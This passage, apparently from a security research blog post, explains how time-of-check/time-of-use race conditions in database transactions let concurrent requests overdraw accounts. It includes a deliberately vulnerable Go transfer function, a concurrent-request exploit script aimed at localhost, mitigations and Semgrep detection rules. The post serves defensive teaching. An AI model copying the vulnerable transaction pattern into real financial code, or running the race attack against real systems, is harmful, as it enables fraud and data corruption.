    QueryRow(ctx, "SELECT id, name, balance FROM users WHERE id = $1", source).
    Scan(&user.Id, &user.Name, &user.Balance)

  // (3)
  if amount <= 0 || amount > user.Balance {
    tx.Rollback(ctx)
    return fmt.Errorf("invalid transfer")
  }

  // (4)
  _, err = conn.Exec(ctx, "UPDATE users SET balance = balance - $2 WHERE id = $1", source, amount)
  _, err = conn.Exec(ctx, "UPDATE users SET balance = balance + $2 WHERE id = $1", destination, amount)

  // (5)
  err = tx.Commit(ctx)
  return nil
}

Note: All error checking has been removed for clarity.

For the readers not familiar with Go, here’s a short summary of what the code is doing. We can assume that the application will initially perform authentication and authorization on the incoming HTTP request. When all required checks have passed, the db.Transfer function handling the database logic will be called. At this point the application will:

  1. 1. Establish a new database transactions

  2. 2. Read the source account’s balance

  3. 3. Verify that the transfer amount is valid with regard to the source account’s balance and the application’s business rules

  4. 4. Update the source and destination accounts’ balances appropriately

  5. 5. Commit the database transaction

A transfer can be made by making a request to the /transfer endpoint, like so:

POST /transfer HTTP/1.1
Host: localhost:9009
Content-Type: application/json
Content-Length: 31

{
    "source":1,
    "destination":2,
    "amount":50
}

We specify the source and destination account IDs, and the amount to be transferred between them. The full source code, and other sample apps developed for this research can be found in our playground repo.

Before continuing reading, take a minute and review the code to see if you can spot any issues.

Notice anything? At first look, the implementation seems correct. Sufficient input validation, bounds and balance checks are performed, no possibility of SQL injection, etc. We can also verify this by running the application and making a few requests. We’ll see that transfers are being accepted until the source account’s balance reaches zero, at which point the application will start returning errors for all subsequent requests.

Fair enough. Now, let’s try some more dynamic testing. Using the following Go script, let us try and make 10 concurrent requests to the /transfer endpoint. We’d expect that two request will be accepted (two transfers of 50 with an initial balance of 100) and the rest will be rejected.

func transfer() {
	client := &http.Client{}

	body := transferReq{
		From:   1,
		To:     2,
		Amount: 50,
	}
	bodyBuffer := new(bytes.Buffer)
	json.NewEncoder(bodyBuffer).Encode(body)

	req, err := http.NewRequest("POST", "http://localhost:9009/transfer", bodyBuffer)
	if err != nil {
		panic(err)
	}
	req.Header.Add("Content-Type", `application/json`)
	resp, err := client.Do(req)
	if err != nil {
		panic(err)
	} else if _, err := io.Copy(os.Stdout, resp.Body); err != nil {
		panic(err)
	}
	fmt.Printf(" / status code => %v\n", resp.StatusCode)
}

func main() {
	for i := 0; i < 10; i++ {
		// run transfer as a goroutine
		go transfer()
	}
	time.Sleep(time.Second * 2)
	fmt.Printf("done.\n")
}

However, running the script we see something different. We see that almost all, if not all, of the request were accepted and successfully processed by the application server. Viewing the balance of both accounts with the /dump endpoint will show that the source account has a negative balance.

We have managed to overdraw our account, effectively making money out of thin air! At this point, any person would be asking “why?” and “how?”. To answer them, we first need to take a detour and talk about databases.

Database Transactions and Isolation Levels

Transactions are a way to define a logical unit of work within a database context. Transactions consist of multiple database operations which need to be successfully executed, for the unit to be considered complete. Any failure would result in the transaction being reverted, at which point the developer needs to decide whether to accept the failure or retry the operation. Transactions are a way to ensure ACID properties for database operations. While all properties are important to ensure data correctness and safety, for this post we’re only interested in the “I” or Isolation.

In short, Isolation defines the level to which concurrent transactions will be isolated from each other. This ensures they always operate on correct data and don’t leave the database in an inconsistent state. Isolation is a property which is directly controllable by developers. The ANSI SQL-92 standard defines four isolation levels, which we will take a look at in more detail later onm, but first we need to understand why we need them.

Why Do We Need Isolation?

The isolation levels are introduced to eliminate read phenomena or unexpected behaviors, which can be observed when concurrent transactions are being performed on the set of data. The best way to understand them is with a short example, graciously borrowed from Wikipedia.

Dirty Reads

Dirty reads allow transactions to read uncommitted changes made by concurrent transactions.

-- tx1
BEGIN;
SELECT age FROM users WHERE id = 1; -- age = 20 
-- tx2
BEGIN;
UPDATE users SET age = 21 WHERE id = 1;
-- tx1
SELECT age FROM users WHERE id = 1; -- age = 21 
-- tx2
ROLLBACK; -- the second read by tx1 is reverted

Non-Repeatable Reads

Non-repeatable reads allow sequential SELECT operations to return different results as a result of concurrent transactions modifying the same table entry.

-- tx1
BEGIN;
SELECT age FROM users WHERE id = 1; -- age = 20 
-- tx2
UPDATE users SET age = 21 WHERE id = 1;
COMMIT;
-- tx2
SELECT age FROM users WHERE id = 1; -- age = 21

Phantom Reads

Phantom reads allow sequential SELECT operations on a set of entries to return different results due to modifications done by concurrent transactions.

-- tx1
BEGIN;
SELECT name FROM users WHERE age > 17; -- returns [Alice, Bob]
-- tx2
BEGIN;
INSERT INTO users VALUES (3, 'Eve', 26);
COMMIT;
-- tx1
SELECT name FROM users WHERE age > 17; -- returns [Alice, Bob, Eve]

In addition the phenomena defined in the standard, behaviors such as “Read Skews”, “Write Skews” and “Lost Updates” can be observed in the real world.

Lost Updates

Lost updates occur when concurrent transactions perform an update on the same entry.

-- tx1
BEGIN;
SELECT * FROM users WHERE id = 1;
-- tx2
BEGIN;
SELECT * FROM users WHERE id = 1;
UPDATE users SET name = 'alice' WHERE id = 1;
COMMIT; -- name set to 'alice'
-- tx1
UPDATE users SET name = 'bob' WHERE id = 1;
COMMIT; -- name set to 'bob'

This execution flow results in the change performed by tx2 to be overwritten by tx1.

Read and write skews usually arise when the operations are performed on two or more entries that have a foreign-key relationship. The examples below assume that the database contains two tables: a users table which stores information about a particular user, and a change_log table which stores information about the user who performed the latest change of the target user’s name column:

CREATE TABLE users(
  id INT PRIMARY KEY NOT NULL, 
  name TEXT NOT NULL
);

CREATE TABLE change_log(
  id INT PRIMARY KEY NOT NULL, 
  updated_by VARCHAR NOT NULL, 
  user_id INT NOT NULL,
  CONSTRAINT user_fk FOREIGN KEY (user_id) REFERENCES users(id)
);

Read Skews

If we assume that we have the following sequence of execution:

-- tx1
BEGIN;
SELECT * FROM users WHERE id = 1; -- returns 'old_name'
-- tx2
BEGIN;
UPDATE users SET name = 'new_name' WHERE id = 1;
UPDATE change_logs SET updated_by = 'Bob' WHERE user_id = 1;
COMMIT;
-- tx1
SELECT * FROM change_logs WHERE user_id = 1; -- return Bob

the view of tx1 transaction is that the user Bob performed tha last change on the user with ID: 1, setting their name to old_name.

Write Skews

In the sequence of operations shown below, tx1 will perform its update under the assumption that the user’s name is Alice and there were no prior changes on the name.

-- tx1
BEGIN;
SELECT * FROM users WHERE id = 1; -- returns Alice
SELECT * FROM change_logs WHERE user_id = 1; -- returns an empty set
-- tx2
BEGIN;
SELECT * FROM users WHERE id = 1; 
UPDATE users SET name = 'Bob' WHERE id = 1; -- new name set
COMMIT;
-- tx1
UPDATE users SET name = 'Eve' WHERE id = 1; -- new name set
COMMIT;

However, tx2 performed its changes before tx1 was able to complete. This results in tx1 performing an update based on state which was changed during its execution.


Isolation levels are designed to guard against zero or more of these read phenomena. Let’s look at the them is more detail.

Read Uncommitted

Read Uncommitted (RU) is the lowest isolation level provided. At this level, all phenomena discussed above can be observed, including reading uncommitted data, as the name suggests. While transactions using this isolation level can result in higher throughput in highly concurrent environments, it does mean that concurrent transactions will likely operate with inconsistent data. From a security standpoint, this is not a desirable property of any business-critical operation.

Thankfully, this it not a default in any database engine, and needs to be explicitly set by developers when a creating a new transaction.

Read Committed

Read Committed (RC) builds on top of the previous level’s guarantee and completely prevents dirty reads. However, it does allow other transactions to modify, insert, or delete data between individual operations of the running transaction, which can result in non-repeatable and phantom reads.

Read Committed is the default isolation level in most database engines. MySQL is an outlier here.

Repeatable Read

In similar fashion, Repeatable Read (RR) improves the previous isolation level, while adding a guarantee that non-repeatable reads will also be prevented. The transaction will view only data which was committed at the start of the transactions. Phantom reads can still be observed at this level.

Serializable

Finally, we have the Serializable (S) isolation level. The highest level is designed to prevent all read phenomena. The result of concurrently executing multiple transactions with Serializable isolation will be equivalent to them being executed in serial order.

Data Races and Race Conditions

Now that we have that covered, let’s circle back to the original example. If we assume that the example was using Postgres and we’re not explicitly setting the isolation level, we’ll be using the Postgres default: Read Committed. This setting will protect us from dirty reads, and phantom or non-repeatable reads are not a concern, since we’re not performing multiple reads within the transaction.

The main reason why our example is vulnerable boils down to concurrent transaction execution and insufficient concurrency control. We can enable database logging to easily see what is being executed on the database level when our example application is being exploited.

Pulling the logs for our example, we can see something similar to:

 1. [TX1] LOG:  BEGIN ISOLATION LEVEL READ COMMITTED
 2. [TX2] LOG:  BEGIN ISOLATION LEVEL READ COMMITTED
 3. [TX1] LOG:  SELECT id, name, balance FROM users WHERE id = 2
 4. [TX2] LOG:  SELECT id, name, balance FROM users WHERE id = 2
 5. [TX1] LOG:  UPDATE users SET balance = balance - 50 WHERE id = 2
 6. [TX2] LOG:  UPDATE users SET balance = balance - 50 WHERE id = 2
 7. [TX1] LOG:  UPDATE users SET balance = balance + 50 WHERE id = 1
 8. [TX1] LOG:  COMMIT
 9. [TX2] LOG:  UPDATE users SET balance = balance + 50 WHERE id = 1
10. [TX2] LOG:  COMMIT

What we initially notice is that the individual operations of a single transaction are not executed as a single unit. Their individual operations are interweaved, contradicting how the initial transaction definition described them (i.e., a single unit of execution). This interweaving occurs as a result of transactions being executed concurrently.

Concurrent Transaction Execution

Databases are designed to execute their incoming workload concurrently. This results in an increased throughput and ultimately a more performant system. While implementation details can vary between different database vendors, at a high level concurrent execution is implemented using “workers”. Databases define a set of workers whose job is to execute all transactions assigned to them by a component usually named “scheduler”. The workers are independent of each other and can be conceptually thought of as application threads. Like application threads, they are subject to context switching, meaning that they can be interrupted mid-execution, allowing other workers to perform their work. As a result we can end up having partial transaction execution, resulting in the interweaved operations we saw in the log output above. As with multithreaded application code, without proper concurrency control, we run the risk of encountering data races and race conditions.

Going back to the database logs, we can also see that both transactions are trying to perform an update on the same entry, one after the other (lines #5 and #6). Such concurrent modification will be prevented by the database by setting a lock on the modified entry, protecting the change until the transaction that made the change completes or fails. Databases vendors are free to implement any number of different lock types, but most of them can be simplified to two types: shared and exclusive locks.

Shared (or read) locks are acquired on table entries read from the database. They are not mutually exclusive, meaning multiple transactions can hold a shared lock on the same entry.

Exclusive (or write) locks, as the name suggests are exclusive. Acquired when a write/update operation is performed, only one lock of this type can be active per table entry. This helps prevent concurrent changes on the same entry.

Database vendors provide a simple way to query active locks at any time of the transactions execution, given you can pause it or are executing it manually. In Postgres for example, the following query will show the active locks:

SELECT locktype, relation::regclass, mode, transactionid AS tid, virtualtransaction AS vtid, pid, granted, waitstart FROM pg_catalog.pg_locks l LEFT JOIN pg_catalog.pg_database db ON db.oid = l.database WHERE (db.datname = '<db_name>' OR db.datname IS NULL) AND NOT pid = pg_backend_pid() ORDER BY pid;

A similar query can be used for MySQL:

SELECT thread_id, lock_data, lock_type, lock_mode, lock_status FROM performance_schema.data_locks WHERE object_name = '<db_name>';

For other database vendors refer to the appropriate documentation.

Root Cause

The isolation level used in our example (Read Committed) will not place any locks when data is being read from the database. This means that only the write operations will be placing locks on the modified entries. If we visualize this, our issue becomes clear:

Transaction's Critical Section

The lack of locking on the SELECT operation allows for concurrent access to a shared resource. This introduces a TOCTOU (time-of-check, time-of-use) issue, leading to an exploitable race condition. Even though the issue is not visible in the application code itself, it becomes obvious in the database logs.

Applying Theory in Practice

Different code patterns can allow for different exploit scenarios. For our particular example, the main difference will be how the new application state is calculated, or more specifically, which values are used in the calculation.

Pattern #1 - Calculations Using Current Database State

In the original example, we can see that the new balance calculations will happen on the database server. This is due to how the UPDATE operation is structured. It containins a simple addition/subtraction operation, which will be calculated by the database using the current value of the balance column at time of execution. Putting it all together, we end up with an execution flow shown on the graph below.

Vulnerable Pattern #1

Using the database’s default isolation level, the SELECT operation will be executed before any locks are created and the same entry will be returned to the application code. The transaction which gets its first UPDATE to execute, will enter the critical section and will be allowed to execute its remaining operations and commit. During that time, all other transactions will hang and wait for the lock to be released. By committing its changes, the first transaction will change the state of the database, effectively breaking the assumption under which the waiting transaction was initiated on. When the second transaction executes its UPDATEs, the calculations will be performed on the updated values, leaving the application in an incorrect state.

Pattern #2 - Calculations Using Stale Values

Working with stale values happens when the application code reads the current state of the database entry, performs the required calculations at the application layer and uses the newly calculated value in an UPDATE operation. We can perform a simple refactoring to our initial example and move the “new value” calculation to the application layer.

func (db *Db) Transfer(source int, destination int, amount int) error {
  ctx := context.Background()
  conn, err := pgx.Connect(ctx, db.databaseUrl)
  defer conn.Close(ctx)

  tx, err := conn.BeginTx(ctx)

  var userSrc User
  err = conn.
    QueryRow(ctx, "SELECT id, name, balance FROM users WHERE id = $1", source).
    Scan(&userSrc.Id, &userSrc.Name, &userSrc.Balance)

  var userDest User
  err = conn.
    QueryRow(ctx, "SELECT id, name, balance FROM users WHERE id = $1", destination).
    Scan(&userDest.Id, &userDest.Name, &userDest.Balance)

  if amount <= 0 || amount > userSrc.Balance {
    tx.Rollback(ctx)
    return fmt.Errorf("invalid transfer")
  }

  // note: balance calculations moved to the application layer
  newSrcBalance := userSrc.Balance - amount
  newDestBalance := userDest.Balance + amount

  _, err = conn.Exec(ctx, "UPDATE users SET balance = $2 WHERE id = $1", source, newSrcBalance)
  _, err = conn.Exec(ctx, "UPDATE users SET balance = $2 WHERE id = $1", destination, newDestBalance)

  err = tx.Commit(ctx)
  return nil
}

If two or more concurrent requests call the db.Transfer function at the same time, there is a high probability that the initial SELECT will be executed before any locks are created. All function calls will read the same value from the database. The amount verification will pass successfully and the new balances will be calculated. Let’s see how does this scenario affect out database state if we run the previous test case:

Vulnerable Pattern #2

At first glance, the database state doesn’t show any inconsistencies. That is because both transactions preformed their amount calculation based on the same state and both executed UPDATE operations with the same amounts. Even though the database state was not corrupted, it’s worth bearing in mind that we were able to execute the transaction more times that what the business logic should allow. For example, an application built using a microservice architecture might implement business logic such as:

Vulnerable Pattern #2 - Microservice Application

If Service T assumes that all incoming requests from the main application are valid, and does not perform any additional validation itself, it will happily process any incoming requests. The race condition described before allows us to exploit such behavior and call the downstream Service T multiple times, effectively performing more transfers that the business requirements would allow.

This pattern can also be (ab)used to corrupt the database state. Namely, we can perform multiple transfers from the source account to different destination accounts.

Vulnerable Pattern #2.1

With this exploit, both concurrent transactions will initially see a source balance of 100, which will pass the amount verification.

Exploitation in the Real World

If you run the sample application locally, with a database running on the same machine, you will likely see that most, if not all, of the requests made to the /transfer endpoint will be accepted by the application server. The low latency between client, application server and database server allow all requests to hit the race window and successfully commit. However, real-world application deployments are much more complex, running in cloud environments, deployed using Kubernetes clusters, placed behind reverse proxies and protected by firewalls.

We were curious to see how difficult is to hit the race window in a real-world context. To test that we set up a simple application, deployed in an AWS Fargate container, alongside another container running the selected database.

Testing was focused on three databases: Postgres, MySQL and MariaDB.

The application logic was implemented using two programming languages: Go and Node. These languages were chosen to allow us to see how their different concurrency models (Go’s goroutines vs. Node’s event loop) impact exploitability.

Finally, we specified three techniques of attacking the application:

  1. 1. simple multi-threaded loop

  2. 2. last-byte sync for HTTP/1.1

  3. 3. single packet attacks for HTTP/2.0

All of these were performed using BurpSuite’s extensions: “Intruder” for (1) and “Turbo Intruder” for (2) and (3).

Using this setup, we attacked the application by performing 20 requests using 10 threads/connections, transferring an amount of 50 from Bob (account ID 2 with a starting balance of 200) to Alice. Once the attack was done, we noted the number of accepted requests. Given a non-vulnerable application, there shouldn’t be more than 4 accepted requests.

This was performed 10 times, for each combination of application/database/attack method. The number of successfully processed requests was noted. From those numbers we conclude if a specific isolation level is exploitable or not. Those results can be found here.

Results and Observations

Our testing showed that if this pattern is present in an application, it is very likely that it can be exploited. In all cases, except for the Serializable level, we were able to exceed the expected number of accepted requests, overdrawing the account. The number of accepted requests varies between different technologies, but the fact that we were able to exceed it (and in some cases, to a significant degree) is sufficient to demonstrate the exploitability of the issue.

If an attacker is able to get a large number of request to the server in the same instant, effectively creating conditions of a local access, the number of accepted requests jumps up by a significant amount. So, to maximize the possibility of hitting the race window, testers should prefer methods such as last-byte sync or the single packet attack.

One outlier is Postgres’ Repeatable Read level. The reason it’s not vulnerable is that it implements an isolation level called Snapshot Isolation. The guarantees provided by this isolation level sit between Repeatable Read and Serializable, ultimately providing sufficient protection and mitigating the race conditions for our example.

The languages concurrency modes did not have any notable impact on the exploitability of the race condition.

Mitigation

On a conceptual level, the fix only requires the start of the critical section to be moved to the beginning of the transaction. This will ensure that the transaction which first reads the entry gets exclusive access to it and is the only one allowed to commit. All others will wait for its completion.

Mitigation can be implemented in a number of ways. Some of them require manual work, while others come out of the box, provided by the database of choice. Let’s start by looking at the simplest and generally preferred way: setting the transaction isolation level to Serializable.

As mentioned before, the isolation level is a user/developer controlled property of a database transaction. It can be set by simply specifying it when creating a transaction:

BEGIN TRANSACTION SET TRANSACTION ISOLATION LEVEL SERIALIZABLE

This may slightly vary from database to database, so it’s always best to consult the appropriate documentation. Usually ORMs or database drivers provide an application level interface for setting the desired isolation level. Postgres’ Go driver pgx allows users to do the following:

tx, err := conn.BeginTx(ctx, pgx.TxOptions{IsoLevel: pgx.Serializable})

It is worth noting that Serizalizable, being the highest isolation level, may have an impact of the performance of your application. However, its use can be limited to only the business-critical transaction. All other transactions can remain unchanged and be executed with the database’s default isolation level or any appropriate level for that particular operation.

One alternative to this method is implementing pessimistic locking via manual locking. The idea behind this method is that the business-critical transaction will obtain all required locks at the beginning and only release them when the transaction completes or fails. This ensures that no other concurrently executing transaction will be able to interfere. Manual locking can be performed by specifying the FOR SHARE or FOR UPDATE options your SELECT operations:

SELECT id, name, balance FROM users WHERE id = 1 FOR UPDATE

This will instruct the database to place a shared or exclusive lock, respectively, to all entries returned by the read operation, effectively disallowing any modification to it until the lock is released. This method can, however, be error prone. There is always a possibility that other operations may get overlooked or new ones will be added without the FOR SHARE / FOR UPDATE option, potentially re-introducing the data race. Additionally, scenarios such as the one shown below, may be possible at lower isolation levels.

Lost Update

The graph shows a scenario where ‘tx2’ performs validation on a value which becomes stale after tx1 commits, and ends up overwriting the update performed by tx1, leading to a Lost Update.

Finally, mitigation can also be implemented using optimistic locking. The conceptual opposite of pessimistic locking, optimistic locking expects that nothing will go wrong and only performs conflict detection at the end of the transaction. If a conflict is detected (i.e., underlining data was modified by a concurrent transaction), the transaction will fail and will need to be retried. This method is usually implemented using a logic clock, or a table column, whose value must not change during the execution of the transaction.

The simplest way to implement this is by introducing a version column in your table:

CREATE TABLE users(
  id INT PRIMARY KEY NOT NULL AUTO_INCREMENT, 
  name TEXT NOT NULL, 
  balance INT NOT NULL,
  version INT NOT NULL AUTO_INCREMENT
);

The value of the version column must then be always verified when performing any write/update operations to the database. If the value changed, the operation will fail, failing the entire transaction.

UPDATE users SET balance = 100 WHERE id = 1 AND version = <last_seen_version>

Detection

If the application uses an ORM, setting the isolation level would usually entails calling a setter function, or supplying it as a function parameter. On the other hand, if the application constructs database transactions using raw SQL statements, the isolation level will be supplied as part of the transaction’s BEGIN statement.

Both those methods represent a pattern which can be search for using tools such as Semgrep. So, if we assume that our application is build using Go and uses the pgx to access to data stored in a Postgres database, we can use the following Semgrep rules to detect instances of unspecified isolation levels.

1. Raw SQL Transaction

rules:
  - id: pgx-sql-tx-missing-isolation-level
    message: "SQL transaction without isolation level"
    languages:
      - go
    severity: WARNING
    patterns:
      - pattern: $CONN.Exec($CTX, $BEGIN)
      - metavariable-regex:
          metavariable: $BEGIN
          regex: ("begin transaction"|"BEGIN TRANSACTION")

2. Missing pgx Transaction Creation Options

rules:
  - id: pgx-tx-missing-options
    message: "Postgres transaction options not set"
    languages:
      - go
    severity: WARNING
    patterns:
      - pattern: $CONN.BeginTx($CTX)

3. Missing Isolation Level in pgq Transaction Creation Options

rules:
  - id: pgx-tx-missing-options-isolation
    message: "Postgres transaction isolation level not set"
    languages:
      - go
    severity: WARNING
    patterns:
      - pattern: $CONN.BeginTx($CTX, $OPTS)
      - metavariable-pattern:
          metavariable: $OPTS
          patterns:
            - pattern-not: >
                $PGX.TxOptions{..., IsoLevel:$LVL, ...}

All these patterns can be easily modified to suit you tech-stack and database of choice.

It’s important to note that rules like these are not a complete solution. Integrating them blindly into an existing pipeline will result in a lot of noise. We would rather recommend using them to build an inventory of all transactions the application performs, and use that information as a starting point to review the application and apply hardening if it is required.

Closing Thoughts

To finish up, we should emphasize that this is not a bug in database engines. This is part of how isolation levels were designed and implemented and it is clearly described in both the SQL specification and dedicated documentation for each database. Transactions and isolation levels were designed to protect concurrent operations from interfering with each other. Mitigations against data races and race conditions, however, are not their primary use case. Unfortunately, we found that this is a common misconception.

While usage of transactions will help guard the application from data corruptions under normal circumstances, it is not sufficient to mitigate data races. When this insecure pattern is introduced in business-critical code (account management functionality, financial transactions, discount code application, etc.), the likelihood of it being exploitable is high. For that reason, review your application’s business-critical operations and verify that they are doing proper data locking.

Resources

This research was presented by Viktor Chuchurski (@viktorot) at the 2024 OWASP Global AppSec conference in Lisbon. The recording of that presentation can be found here and the presentation slides can be downloaded here.

Playground code can be found on Doyensec’s GitHub.

More information

If you would like to learn more about our other research, check out our blog, follow us on X (@doyensec) or feel free to contact us at info@doyensec.com for more information on how we can help your organization “Build with Security”.

Appendix - Testing Results

The table below shows which isolation level allowed race condition to happen for the databases we tested as part of our research.

RU RC RR S
MySQL Y Y Y N
Postgres Y Y N N
MariaDB Y Y Y N